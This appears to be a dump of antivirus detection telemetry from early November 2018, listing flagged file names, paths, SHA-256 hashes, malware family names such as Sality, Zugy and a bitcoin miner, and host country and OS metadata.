  Row(detection=Row(filename='avscan-20181102-051629-6cd2026c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051629-6CD2026C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060330-fe75b38d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060330-FE75B38D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052335-6a6cd998', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052335-6A6CD998', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052930-3e2d1a0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052930-3E2D1A0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052145-292bfbb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052145-292BFBB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062434-ef4bd967', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062434-EF4BD967', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062102-711d4f3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062102-711D4F3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051630-6d87a5f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051630-6D87A5F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052330-67b862be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052330-67B862BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054947-136e7bb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054947-136E7BB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062328-c8014fba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062328-C8014FBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050841-55e2fc33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050841-55E2FC33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:13:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053849-8b507da6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053849-8B507DA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060955-e37f8b34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060955-E37F8B34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054338-37f3e2bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054338-37F3E2BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062605-25c0792f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062605-25C0792F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052532-b098228b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052532-B098228B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051242-e572e3e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051242-E572E3E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050853-5ccf0b93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050853-5CCF0B93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053454-ff2e9782', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053454-FF2E9782', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054418-4f9062d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054418-4F9062D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054859-f7078f30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054859-F7078F30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055112-46787050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055112-46787050', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053303-bd0da636', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053303-BD0DA636', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061702-e242fb32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061702-E242FB32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053409-e46ba7c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053409-E46BA7C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050558-f49cbb8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050558-F49CBB8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050843-574510de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050843-574510DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:49:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054320-2d3dfb40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054320-2D3DFB40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054327-310b5ba6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054327-310B5BA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:31:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062432-ee20eb54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062432-EE20EB54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-160305-0970382a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160305-0970382A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftclean.exe', filepath='D:\\CPT\\โปรแกรม PLC Omron\\CXONE V4.1\\drivers\\USB\\7\\CS1W-CIF31\\FTClean.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='08e6f8fed603c8a9c670ca6fa5469ff66e9cf0b06acf666cd9afa5659839558e', metadata=Row(cmdline='\\/c', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=218704, timestamp='2018-11-01T04:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181311-f98cd690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76e5719a\\AVSCAN-20181101-181246-F6440152\\AVSCAN-20181101-181311-F98CD690', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='10696ea7f10bc7fb3349ec33519f5a6fe7902b07099692f84f0b233a028bbe52', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\10696EA7F10BC7FB3349EC33519F5A6FE7902B07099692F84F0B233A028BBE52', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='10696ea7f10bc7fb3349ec33519f5a6fe7902b07099692f84f0b233a028bbe52', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T09:02:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155653-cac95be8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155653-CAC95BE8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T17:08:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155335-a967d3f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155335-A967D3F8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160241-05405d43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160241-05405D43', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172633-d730cffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172633-D730CFFC', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='494a63825e6601449a227403d96e38e420501e8b9e0d9853426ba4e841cb34c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154554-5bbdfead', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154554-5BBDFEAD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cintia.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\FD\\New Folder\\fd\\CINTIA\\CINTIA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-26-19.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T02:58:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lemburan.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\LEMBURAN\\LEMBURAN.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1255236\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\My Documents\\Preuzimanja\\flashupdate.exe', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:05:02Z'), dt=datetime.date(2018, 11, 1)),
